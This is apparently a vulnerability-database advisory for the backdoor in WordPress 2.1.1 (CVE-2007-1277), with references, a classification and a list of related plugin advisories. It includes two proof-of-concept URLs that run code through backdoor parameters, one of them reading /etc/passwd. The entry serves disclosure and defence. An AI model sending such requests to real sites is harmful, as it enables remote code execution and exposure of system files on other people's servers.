WordPress Vulnerabilities

WordPress 2.1.1 - Command Execution Backdoor

Proof of Concept

http://www.example.com/wp-includes/feed.php?ix=phpinfo();
http://www.example.com/wp-includes/theme.php?iz=cat /etc/passwd

Affects WordPress

2.1.1
Fixed in WordPress 2.1.2

References

CVE
CVE-2007-1277
URL
https://exchange.xforce.ibmcloud.com/vulnerabilities/32807
URL
https://wordpress.org/news/2007/03/upgrade-212/

Classification

Type
RCE
OWASP top 10
A1: Injection
CWE
CWE-94

Miscellaneous

Verified
No
WPVDB ID
5c4cf85b-97e8-4044-839b-b3656c337706

Timeline

Publicly Published
2014-08-01 (about 9 years ago)
Added
2014-08-01 (about 9 years ago)
Last Updated
2019-10-21 (about 4 years ago)

Other

Published
Title
Published
2022-11-08
Title
Theme-Demo-Importer < 1.1.1 - Admin+ Arbitrary File Upload
Published
2014-08-01
Title
AREA53 <= 1.0.5 - File Upload Code Execution
Published
2020-05-07
Title
Elementor Pro < 2.9.4 - Authenticated Arbitrary File Upload
Published
2021-02-22
Title
QuadMenu < 2.0.7 - Unauthenticated RCE via compiler_save
Published
2020-03-25
Title
Product Lister for Walmart <= 1.0.0 - Unauthenticated RCE via Outdated PHPUnit